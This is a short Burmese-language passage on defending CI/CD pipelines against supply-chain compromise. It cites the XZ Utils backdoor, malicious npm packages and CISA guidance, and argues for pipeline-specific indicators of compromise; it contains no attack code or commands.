အဖွဲ့များစွာသည် အားနည်းချက်ညွှန်ပြချက်များ၏တန်ဖိုးကို နားလည်ကြသော်လည်း၊ ၎င်းတို့သည် ဆာဗာများနှင့် ကွန်ရက်မှတ်တမ်းများမှ ထောက်လှမ်းမှုကိုသာ အားကိုးနေရဆဲဖြစ်သည်။ ထို့ကြောင့်၊ တိုက်ခိုက်သူများသည် ပုံမှန်ခြေရာများမကျန်ဘဲ build များကို အဆိပ်ခတ်နိုင်သည် သို့မဟုတ် malware ထည့်သွင်းနိုင်သည်။ ထို့ကြောင့် XZ Utils backdoor သို့မဟုတ် malicious npm package များကဲ့သို့သော ဖြစ်ရပ်များသည် ထုတ်လုပ်မှုအဆင့်သို့ မရောက်မချင်း မသိရှိနိုင်ခဲ့ပါ။
ဤကဲ့သို့သော ထောက်ပံ့ရေးကွင်းဆက် ညှိနှိုင်းမှုများကိုလည်း မီးမောင်းထိုးပြထားသည်- CISA ရဲ့ ထောက်ပံ့ရေးကွင်းဆက် လုံခြုံရေးလမ်းညွှန်ချက်တိုက်ခိုက်သူများသည် ပစ်မှတ်ထားလာကြောင်း သတိပေးသည် CI/CD pipelines နှင့် မှတ်ပုံတင်များ။
အဆိုပါ Takeaway
ရိုးရာ IOC ဆိုက်ဘာလုံခြုံရေးသည် လိုအပ်သော်လည်း မလုံလောက်ပါ။ အဓိကအားဖြင့် အဖွဲ့များသည် တိကျသော ညှိနှိုင်းမှုညွှန်းကိန်းများကို အသိအမှတ်ပြုရမည်။ CI/CD pipelines. ထိုအခါမှသာ ၎င်းတို့သည် အန္တရာယ်ရှိသော ကုဒ်ကို ရှာဖွေတွေ့ရှိနိုင်သည် သို့မဟုတ် pipeline အလွဲသုံးစားပြုမှုသည် ပတ်ဝန်းကျင်သို့ ပျံ့နှံ့မသွားမီ။







